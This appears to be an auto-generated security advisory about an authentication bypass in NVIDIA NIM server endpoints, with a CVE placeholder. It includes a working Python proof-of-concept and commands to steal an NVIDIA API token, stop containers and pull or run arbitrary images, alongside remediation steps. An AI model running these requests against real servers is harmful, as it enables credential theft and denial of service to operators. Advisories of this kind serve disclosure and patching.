NVIDIA NIM, Missing Authentication, CVE-2024-XXXX (High)

By /

Listen to this Post

The vulnerability arises from a misconfiguration in the authentication middleware of the NVIDIA NIM service. In packages/server/src/utils/constants.ts, the path `’/api/v1/nvidia-nim’` is included in the `WHITELIST_URLS` array, which causes the global JWT/API-key authentication to be completely bypassed for all endpoints under /api/v1/nvidia-nim/. The controller actions in `packages/server/src/controllers/nvidia-nim/index.ts` do not implement any additional authentication checks, leaving every subpath open to unauthenticated access. This affects critical operations such as token generation (/get-token), container lifecycle management (/start-container, /stop-container, /pull-image), and information disclosure endpoints (/list-running-containers, /get-image, /get-container). An unauthenticated attacker can retrieve a valid NVIDIA API token from /get-token, which grants access to NVIDIA’s inference API and exposes over 170 LLM models. On systems with Docker/NIM installed, the attacker can list running containers, stop containers (causing denial of service), start containers with arbitrary images, and pull malicious Docker images. The endpoints return HTTP 500 errors (instead of 401) when the container runtime is unavailable, confirming the authentication bypass. The root cause is a simple whitelist oversight, making this a CWE-306 (Missing Authentication for Critical Function) issue with a CVSS v3.1 score of 8.6 (High).
Platform: NVIDIA NIM
Version: Unspecified
Vulnerability: Missing Authentication
Severity: High
Date: 2024-12-01

Prediction: Patch expected soon

What Undercode Say:

Proof of Concept Python script (poc.py)
!/usr/bin/env python3
"""
POC: Privileged NVIDIA NIM endpoints are unauthenticated
Usage: python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/get-token
"""
import argparse
import urllib.request
import urllib.error
def main():
ap = argparse.ArgumentParser()
ap.add_argument("--target", required=True, help="Base URL, e.g. http://host:port")
ap.add_argument("--path", required=True, help="NIM endpoint path")
ap.add_argument("--method", default="GET", choices=["GET", "POST"])
ap.add_argument("--data", default="", help="Raw request body for POST")
args = ap.parse_args()
url = args.target.rstrip("/") + "/" + args.path.lstrip("/")
body = args.data.encode("utf-8") if args.method == "POST" else None
req = urllib.request.Request(
url,
data=body,
method=args.method,
headers={"Content-Type": "application/json"} if body else {},
)
try:
with urllib.request.urlopen(req, timeout=10) as r:
print(r.read().decode("utf-8", errors="replace"))
except urllib.error.HTTPError as e:
print(e.read().decode("utf-8", errors="replace"))
if <strong>name</strong> == "<strong>main</strong>":
main()

Obtain NVIDIA API token (no authentication)
python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/get-token
List running containers
python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/list-running-containers
Stop a container (DoS)
python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/stop-container \
--method POST --data '{"containerId":"<target_id>"}'
Pull arbitrary image
python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/pull-image \
--method POST --data '{"imageTag":"malicious/image","apiKey":"any"}'
Validate token against NVIDIA API
curl -H "Authorization: Bearer nvapi-GT-..." https://integrate.api.nvidia.com/v1/models

Exploit:

  • Send unauthenticated GET request to `/api/v1/nvidia-nim/get-token` to retrieve a valid NVIDIA API token.
  • Use the token to list all available models via NVIDIA’s API.
  • Send unauthenticated GET to `/api/v1/nvidia-nim/list-running-containers` to gather container IDs.
  • Send unauthenticated POST to `/api/v1/nvidia-nim/stop-container` with a container ID to stop it (DoS).
  • Send unauthenticated POST to `/api/v1/nvidia-nim/pull-image` with an arbitrary image tag to consume resources or introduce malicious images.
  • Send unauthenticated POST to `/api/v1/nvidia-nim/start-container` to run containers with attacker-controlled images.

Protection from this CVE:

  • Remove `’/api/v1/nvidia-nim’` from the `WHITELIST_URLS` array in constants.ts.
  • Implement authentication checks in all NIM controller actions.
  • Restrict network access to NIM endpoints using firewall rules.
  • Apply the official patch once released.

Impact:

  • Leakage of valid NVIDIA API tokens, granting access to LLM models.
  • Full control over container runtime: listing, stopping, starting, and pulling arbitrary images.
  • Denial of service through container termination.
  • Information disclosure of container details and image metadata.
  • Potential resource exhaustion and malicious image deployment.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top